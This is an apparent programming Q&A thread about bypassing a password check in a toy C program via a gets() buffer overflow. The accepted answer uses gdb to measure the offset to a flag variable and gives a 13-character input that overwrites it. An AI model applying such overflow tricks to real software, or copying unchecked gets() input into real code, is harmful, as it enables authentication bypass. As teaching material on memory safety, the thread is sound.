# Buffer overflow attack without changing the return address

Tags: c, linux, buffer-overflow

I need to call the login function in the below sample code. We can achieve this by changing the return address to the login function directly using buffer overflow attack. But I need to keep the return address as the same. Is there any other way to print logged in message without changing the return address?

```
char getPass()
{
     int flag = 'F';
     char pass[10];
     gets(pass);
     return (char) flag;
}

void login()
{
    printf("Logged in");
    exit(0);
}
void main()
{
    printf("Enter Passwd");
    if(getPass() == 'T')
    {
        login();
    }else{
        print("Failed");
        exit(1);
    }
}
```

Comment: gets() has been removed from C as of C11 because it is a security nightmare.  So this  code won't compile on a C11 compiler.

Comment: @JohnH That's exactly the point of the question.  OP is attempting to exploit that vulnerability.

Answer (score 4, accepted):

Getting this to work depends on how the compiler decided to arrange the variables.  If `flag` appears in memory after `pass`, then entering in more characters than `pass` will hold results in `flag` getting overwritten.

When I ran this program in a debugger and printed the addresses of these variables, I got the following:

```
(gdb) start
Temporary breakpoint 1 at 0x40060e: file x1.c, line 19.
Starting program: /home/dbush/./x1 

Temporary breakpoint 1, main () at x1.c:19
19      printf("Enter Passwd");
Missing separate debuginfos, use: debuginfo-install glibc-2.17-292.el7.x86_64
(gdb) step
20      if(getPass() == 'T')
(gdb) 
getPass () at x1.c:6
6        int flag = 'F';
(gdb) 
8        gets(pass);
(gdb) p pass
$1 = "\000\000\000\000\000\000\000\000", <incomplete sequence \341>
(gdb) p &pass
$2 = (char (*)[10]) 0x7fffffffdec0
(gdb) p &flag
$3 = (int *) 0x7fffffffdecc
```

We can see that *in this particular instance* that `flag` is 12 bytes past the start of `pass`.  My machine is also little-endian, meaning that the first of the 4 bytes of `flag` contain the value to be overwritten.

So we can exploit the buffer overflow vulnerability by entering in 13 characters, the last of which is `T`.  This results in 10 characters being written to `pass`, two more to the padding bytes between `pass` and `flag`, the character `T` in the first byte of `flag`, and a 0 for the terminated null byte in the second byte of `flag`.  Now the variable `flag` contains `'T'` which is what gets returned from the function.

Note also that doing so doesn't write past `flag` into the function's return value.  This is possible because `flag` is an `int` and little endian byte ordering is used.

Sample input/output:

```
[dbush@db-centos7 ~]$ ./x1
Enter Passwd1234567890TTT
Logged in[dbush@db-centos7 ~]$
```